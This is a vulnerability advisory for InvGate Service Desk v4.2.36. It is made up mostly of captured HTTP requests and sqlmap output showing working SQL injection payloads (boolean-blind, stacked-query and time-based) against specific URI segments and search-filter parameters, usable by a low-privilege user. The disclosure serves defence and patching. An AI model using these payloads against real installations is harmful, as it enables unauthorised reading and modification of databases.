InvGate Service Desk v4.2.36 multiple vulnerabilities
http://www.invgate.com/en/service-desk/
http://www.invgate.com/en/service-desk/on-premise-trial/
Invgate Service Desk suffers from many SQL injections as an authenticated, but non-privileged
(end-user role) user. Most are also stacked injections, so an attacker also has the ability to
modify any of the data in the database. The payloads used to determine exploitability are in the
sqlmap payload output, but each was verified to be able to enumerate the current database,
current user, and an assortment of other things. These were tested with an ‘end-user’ user.
SQL injection in last URI segment when dismissing breaking news (no data, just a POST) :
POST /breakingnews/manager/dismiss/breakingnew_id/1 HTTP/1.1
Host: 192.168.1.22
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=0h1m27t02cr3p2fdhfuh0ubpb2
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://192.168.1.22:80/breakingnews/manager/dismiss/breakingnew_id/1) AND
6658=6658 AND (5746=5746
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: http://192.168.1.22:80/breakingnews/manager/dismiss/breakingnew_id/1); SELECT
SLEEP(5)--
Type: AND/OR time-based blind!
Title: MySQL > 5.0.11 AND time-based blind!
Payload: http://192.168.1.22:80/breakingnews/manager/dismiss/breakingnew_id/1) AND
SLEEP(5) AND (9226=9226
-----------------------
SQL injection in 5th URI segment when getting the history of an incident:
GET /incident/history/index/incident_id/5/ajax/1 HTTP/1.1
Host: 192.168.1.22
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.22/incident/show/index/id/5
Cookie: PHPSESSID=visagd05r0id09eba8nr64p4b2
Connection: keep-alive
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://192.168.1.22:80/incident/history/index/incident_id/5) AND 7159=7159 AND
(1439=1439/ajax/1
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: http://192.168.1.22:80/incident/history/index/incident_id/5); SELECT SLEEP(5)-- /
ajax/1
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://192.168.1.22:80/incident/history/index/incident_id/5) AND SLEEP(5) AND
(4123=4123/ajax/1
—
-----------------------------------------
SQL injection in two segments when viewing the history of a given incident for a given author
GET /incident/history/index/id/5/author_id/3/incident_id/5/ajax/1 HTTP/1.1
Host: 192.168.1.22
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.22/incident/show/index/id/5
Cookie: PHPSESSID=0h1m27t02cr3p2fdhfuh0ubpb2
Connection: keep-alive
The injections are in the 7th and 9th segments.
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:!
---
Place: URI
Parameter: #2*
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
(RLIKE)
Payload: http://192.168.1.22:80/incident/history/index/id/5/author_id/3/incident_id/5) RLIKE
(SELECT (CASE WHEN (5283=5283) THEN 5 ELSE 0x28 END)) AND (9940=9940/ajax/1
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: http://192.168.1.22:80/incident/history/index/id/5/author_id/3/incident_id/5); SELECT
SLEEP(5)-- /ajax/1
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://192.168.1.22:80/incident/history/index/id/5/author_id/3/incident_id/5) AND
SLEEP(5) AND (2858=2858/ajax/1
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
(RLIKE)!
Payload: http://192.168.1.22:80/incident/history/index/id/5/author_id/3) RLIKE (SELECT
(CASE WHEN (1161=1161) THEN 3 ELSE 0x28 END)) AND (3766=3766/incident_id/5/ajax/1
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: http://192.168.1.22:80/incident/history/index/id/5/author_id/3); SELECT SLEEP(5)-- /
incident_id/5/ajax/1
Type: AND/OR time-based blind!
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://192.168.1.22:80/incident/history/index/id/5/author_id/3) AND SLEEP(5) AND
(6225=6225/incident_id/5/
--------------------------------------
SQL injection vectors within the request to search for your current open requests:
POST /incident/list/list/default_filter/5 HTTP/1.1
Host: 192.168.1.22
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.22/incident/list/index/default_filter/5
Content-Length: 674
Cookie: PHPSESSID=visagd05r0id09eba8nr64p4b2
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
post_filter%5Blikes%5D%5Bincidents.title%5D=&post_filter%5Blikes%5D%5Bassigneds.name
%5D=&post_filter%5Blikes%5D%5Bassigneds.lastname%5D=&post_filter%5Blikes%5D
%5Bcustomers.name%5D=&post_filter%5Blikes%5D%5Bcustomers.lastname%5D=&post_filter
%5Blikes%5D%5Bincidents.id%5D=&showGroupTab=&post_filter%5Bor_conditions%5D
%5B0%5D%5Bincidents.priority_id%5D%5B%5D=1&post_filter%5Bor_conditions%5D
%5B1%5D%5Bincidents.status_id%5D%5B%5D=1&post_filter%5Bor_conditions%5D
%5B2%5D%5Bincidents.source_id%5D%5B%5D=1&post_filter%5Border%5D%5B1%5D
%5Bcol%5D=incidents.priority_id&post_filter%5Border%5D%5B1%5D%5Bval
%5D=DESC&post_filter%5Bor_conditions%5D%5B3%5D%5Bincidents.type_id%5D%5B
%5D=1
Within the post_filter[or_conditions] parameters, both the incidents.*_id key and the value are
susceptible to SQL injections. Not all of these are needed for a successful request, but this is
what the request looks like coming from the browser. An asterisk (*) was used to test the key
and value.
sqlmap identified the following injection points with a total of 803 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #2*
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)!
Payload: post_filter[likes][incidents.title]=&post_filter[likes]
[assigneds.name]=&post_filter[likes][assigneds.lastname]=&post_filter[likes]
[customers.name]=&post_filter[likes][customers.lastname]=&post_filter[likes]
[incidents.id]=&showGroupTab=&post_filter[or_conditions][0][incidents.priority_id]
[]=1&post_filter[or_conditions][1][incidents.status_id][]=-5375)) OR
(4196=4196)#&post_filter[or_conditions][2][incidents.source_id][]=1&post_filter[order][1]
[col]=incidents.priority_id&post_filter[order][1][val]=DESC&post_filter[or_conditions][3]
[incidents.type_id][]=1
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries!
Payload: post_filter[likes][incidents.title]=&post_filter[likes]
[assigneds.name]=&post_filter[likes][assigneds.lastname]=&post_filter[likes]
[customers.name]=&post_filter[likes][customers.lastname]=&post_filter[likes]
[incidents.id]=&showGroupTab=&post_filter[or_conditions][0][incidents.priority_id]
[]=1&post_filter[or_conditions][1][incidents.status_id][]=1)); SELECT SLEEP(5)--
&post_filter[or_conditions][2][incidents.source_id][]=1&post_filter[order][1]
[col]=incidents.priority_id&post_filter[order][1][val]=DESC&post_filter[or_conditions][3]
[incidents.type_id][]=1
Type: AND/OR time-based blind!
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: post_filter[likes][incidents.title]=&post_filter[likes]
[assigneds.name]=&post_filter[likes][assigneds.lastname]=&post_filter[likes]
[customers.name]=&post_filter[likes][customers.lastname]=&post_filter[likes]
[incidents.id]=&showGroupTab=&post_filter[or_conditions][0][incidents.priority_id]
[]=1&post_filter[or_conditions][1][incidents.status_id][]=1)) AND
7038=BENCHMARK(5000000,MD5(0x4f7a6550)) AND ((5798=5798&post_filter[or_conditions]
[2][incidents.source_id][]=1&post_filter[order][1][col]=incidents.priority_id&post_filter[order][1]
[val]=DESC&post_filter[or_conditions][3][incidents.type_id][]=1
Place: (custom) POST
Parameter: #1*
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: post_filter[likes][incidents.title]=&post_filter[likes]
[assigneds.name]=&post_filter[likes][assigneds.lastname]=&post_filter[likes]
[customers.name]=&post_filter[likes][customers.lastname]=&post_filter[likes]
[incidents.id]=&showGroupTab=&post_filter[or_conditions][0][incidents.priority_id]
[]=1&post_filter[or_conditions][1][incidents.status_id-9395) OR (3084=3084)#]
[]=1&post_filter[or_conditions][2][incidents.source_id][]=1&post_filter[order][1]
[col]=incidents.priority_id&post_filter[order][1][val]=DESC&post_filter[or_conditions][3]
[incidents.type_id][]=1
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: post_filter[likes][incidents.title]=&post_filter[likes]
[assigneds.name]=&post_filter[likes][assigneds.lastname]=&post_filter[likes]
[customers.name]=&post_filter[likes][customers.lastname]=&post_filter[likes]
[incidents.id]=&showGroupTab=&post_filter[or_conditions][0][incidents.priority_id]
[]=1&post_filter[or_conditions][1][incidents.status_id); SELECT SLEEP(5)-- ]
[]=1&post_filter[or_conditions][2][incidents.source_id][]=1&post_filter[order][1]
[col]=incidents.priority_id&post_filter[order][1][val]=DESC&post_filter[or_conditions][3]
[incidents.type_id][]=1
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query - comment)
Payload: post_filter[likes][incidents.title]=&post_filter[likes]
[assigneds.name]=&post_filter[likes][assigneds.lastname]=&post_filter[likes]
[customers.name]=&post_filter[likes][customers.lastname]=&post_filter[likes]
[incidents.id]=&showGroupTab=&post_filter[or_conditions][0][incidents.priority_id]
[]=1&post_filter[or_conditions][1][incidents.status_id) AND
3932=BENCHMARK(5000000,MD5(0x68494a54))#][]=1&post_filter[or_conditions][2]
[incidents.source_id][]=1&post_filter[order][1][col]=incidents.priority_id&post_filter[order][1]
[val]=DESC&post_filter[or_conditions][3][incidents.type_id][]=1